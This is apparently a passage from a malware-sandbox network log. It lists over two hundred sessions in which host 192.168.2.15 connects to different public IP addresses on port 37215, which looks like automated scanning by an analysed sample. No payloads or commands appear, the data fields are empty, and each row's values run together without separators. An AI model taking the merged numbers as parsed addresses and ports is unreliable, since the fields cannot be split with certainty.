                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15991192.168.2.154609441.152.239.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15992192.168.2.1560192186.170.56.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15993192.168.2.1548368157.209.159.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15994192.168.2.154666841.149.229.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15995192.168.2.154350031.115.21.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15996192.168.2.153822094.19.241.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15997192.168.2.1536634156.241.72.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15998192.168.2.1556332157.237.169.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15999192.168.2.1558454102.253.31.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16000192.168.2.1555586157.242.38.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16001192.168.2.155351231.218.210.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16002192.168.2.153744641.24.229.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16003192.168.2.1541598222.137.116.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16004192.168.2.1542378138.40.35.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16005192.168.2.1557842102.80.138.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16006192.168.2.1543450157.120.237.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16007192.168.2.1537566181.135.237.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16008192.168.2.1543054156.139.143.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16009192.168.2.155345437.119.197.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16010192.168.2.1535140138.206.49.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16011192.168.2.1546560190.104.146.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16012192.168.2.153850094.64.73.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16013192.168.2.1560806181.253.39.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16014192.168.2.156010494.90.221.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16015192.168.2.156066294.103.149.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16016192.168.2.155965645.115.15.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16017192.168.2.1546206122.192.146.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16018192.168.2.1554778102.236.30.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16019192.168.2.1535226157.46.123.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16020192.168.2.1539552197.160.28.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16021192.168.2.1558318222.136.243.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16022192.168.2.1553750222.154.168.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16023192.168.2.1535534156.19.74.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16024192.168.2.155412237.23.178.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16025192.168.2.155397894.126.192.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16026192.168.2.1555226121.202.167.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16027192.168.2.1555170138.32.109.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16028192.168.2.154892694.154.134.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16029192.168.2.1560486157.116.120.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16030192.168.2.155549894.176.202.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16031192.168.2.1560008190.36.212.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16032192.168.2.1540484181.70.12.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16033192.168.2.154181031.33.102.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16034192.168.2.154805445.105.75.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16035192.168.2.1556574197.58.147.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16036192.168.2.1545026156.102.91.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16037192.168.2.1534032102.136.201.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16038192.168.2.1540260156.185.191.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16039192.168.2.1551156122.39.132.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16040192.168.2.1557704223.234.116.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16041192.168.2.1535992122.81.58.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16042192.168.2.1560470198.10.66.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16043192.168.2.1542878186.234.104.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16044192.168.2.1545372138.36.219.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16045192.168.2.1537374186.25.149.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16046192.168.2.153427231.68.147.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16047192.168.2.153715431.54.10.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16048192.168.2.153834831.237.114.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16049192.168.2.1553578156.62.108.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16050192.168.2.154587837.71.214.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16051192.168.2.1546120121.5.179.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16052192.168.2.153867045.154.108.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16053192.168.2.1535716121.176.219.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16054192.168.2.1557204156.214.144.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16055192.168.2.155138637.239.219.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16056192.168.2.1543246156.101.193.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16057192.168.2.1553364121.63.210.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16058192.168.2.1551138102.115.120.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16059192.168.2.1549486181.154.200.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16060192.168.2.1552224156.33.69.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16061192.168.2.1542890186.242.27.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16062192.168.2.1549206138.174.87.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16063192.168.2.1556654102.158.54.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16064192.168.2.1556568156.131.11.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16065192.168.2.155556294.234.94.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16066192.168.2.1556594197.110.167.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16067192.168.2.155374037.217.189.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16068192.168.2.1544216102.230.87.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16069192.168.2.1555248190.151.145.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16070192.168.2.1545292138.226.141.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16071192.168.2.155898637.15.137.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16072192.168.2.1551254197.149.42.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16073192.168.2.1548968222.226.214.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16074192.168.2.1545956157.6.185.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16075192.168.2.155025237.182.209.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16076192.168.2.1539092197.18.241.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16077192.168.2.154332837.238.8.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16078192.168.2.1550982197.63.123.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16079192.168.2.1542442181.217.94.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16080192.168.2.154684245.122.60.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16081192.168.2.155717837.80.222.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16082192.168.2.1535014186.123.157.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16083192.168.2.1548076122.76.13.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16084192.168.2.1558046156.108.190.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16085192.168.2.1555972186.193.16.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16086192.168.2.1544340181.243.125.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16087192.168.2.153834841.108.251.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16088192.168.2.156044231.36.109.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16089192.168.2.1546242157.9.171.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16090192.168.2.1550490138.149.140.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16091192.168.2.155515631.206.170.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16092192.168.2.154255641.76.132.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16093192.168.2.1541192197.100.131.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16094192.168.2.153630831.249.249.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16095192.168.2.1548258222.67.252.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16096192.168.2.155293841.216.176.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16097192.168.2.154322294.245.253.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16098192.168.2.155727694.35.1.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16099192.168.2.1554480157.136.147.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16100192.168.2.1533310102.237.133.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16101192.168.2.1556120121.70.165.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16102192.168.2.1556166181.45.108.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16103192.168.2.1556544138.189.252.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16104192.168.2.1542514190.215.206.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16105192.168.2.1534722102.145.92.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16106192.168.2.1551408157.120.35.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16107192.168.2.1542506157.214.139.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16108192.168.2.155700845.24.24.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16109192.168.2.1556264138.184.84.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16110192.168.2.1542898157.95.174.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16111192.168.2.1545254190.122.54.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16112192.168.2.154337445.222.203.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16113192.168.2.1541052122.6.132.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16114192.168.2.154921441.95.248.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16115192.168.2.153519631.136.183.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16116192.168.2.1545470121.14.221.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16117192.168.2.1560732102.111.40.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16118192.168.2.155904841.224.65.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16119192.168.2.155841437.3.212.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16120192.168.2.154218045.96.55.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16121192.168.2.1537024190.24.139.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16122192.168.2.154653841.195.219.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16123192.168.2.1559908222.204.206.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16124192.168.2.1553710156.174.196.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16125192.168.2.1540212156.242.235.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16126192.168.2.155425641.145.17.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16127192.168.2.1552074121.114.73.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16128192.168.2.1541772190.5.163.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16129192.168.2.1536112122.214.58.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16130192.168.2.1553140157.30.202.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16131192.168.2.1547822157.61.255.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16132192.168.2.1539018222.39.245.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16133192.168.2.1557116102.238.9.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16134192.168.2.155651437.55.161.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16135192.168.2.1550210157.50.22.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16136192.168.2.1544942181.65.120.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16137192.168.2.1543146197.115.128.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16138192.168.2.1551100186.13.198.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16139192.168.2.155843294.7.190.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16140192.168.2.155384094.130.81.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16141192.168.2.1552574197.222.127.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16142192.168.2.1534472102.50.86.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16143192.168.2.154966645.182.62.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16144192.168.2.1552818197.240.132.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16145192.168.2.153545431.33.80.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16146192.168.2.1556212156.172.56.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16147192.168.2.1545478149.146.204.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16148192.168.2.1540454197.46.164.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16149192.168.2.1549866181.131.219.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16150192.168.2.1554438122.91.79.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16151192.168.2.1535314138.158.169.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16152192.168.2.1537712121.233.140.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16153192.168.2.155070631.125.158.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16154192.168.2.153764837.249.231.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16155192.168.2.1551156222.23.230.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16156192.168.2.155673445.200.64.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16157192.168.2.155610694.19.7.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16158192.168.2.1560346197.240.42.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16159192.168.2.1553154102.110.123.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16160192.168.2.1535058197.32.252.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16161192.168.2.1555722186.42.66.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16162192.168.2.1547374197.247.166.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16163192.168.2.1554680121.36.61.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16164192.168.2.1539562138.39.243.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16165192.168.2.153618237.150.221.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16166192.168.2.1539484190.47.138.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16167192.168.2.1546358181.167.216.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16168192.168.2.1540256138.12.173.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16169192.168.2.154472845.114.166.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16170192.168.2.1533110122.31.189.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16171192.168.2.1555236197.112.118.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16172192.168.2.156038694.131.43.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16173192.168.2.154015037.137.237.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16174192.168.2.1555400121.32.128.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16175192.168.2.1557210157.171.237.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16176192.168.2.1549216157.178.30.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16177192.168.2.1555184181.144.170.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16178192.168.2.1543026121.200.200.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16179192.168.2.1551866156.212.234.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16180192.168.2.1540830181.140.101.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16181192.168.2.153893637.201.241.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16182192.168.2.153561070.1.195.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16183192.168.2.154105241.249.125.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16184192.168.2.1551962197.254.71.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16185192.168.2.1553446122.137.107.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16186192.168.2.1552264190.238.81.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16187192.168.2.1546708138.90.230.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16188192.168.2.1559772102.62.49.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16189192.168.2.1546536138.180.87.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16190192.168.2.1536400222.160.68.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16191192.168.2.1546250121.29.182.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16192192.168.2.1544940156.115.132.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16193192.168.2.155381031.8.117.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16194192.168.2.1537108138.178.101.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16195192.168.2.1541010222.61.66.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16196192.168.2.1536660181.254.46.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16197192.168.2.1536582157.24.163.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16198192.168.2.15596349.75.94.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16199192.168.2.1540902190.246.39.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16200192.168.2.1556432156.23.136.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16201192.168.2.1540292190.52.206.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16202192.168.2.1544212138.65.56.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16203192.168.2.1549642181.91.58.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16204192.168.2.1559714102.84.230.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16205192.168.2.1548604102.119.230.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16206192.168.2.1547880222.223.244.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16207192.168.2.153646045.131.110.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16208192.168.2.155997441.134.249.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
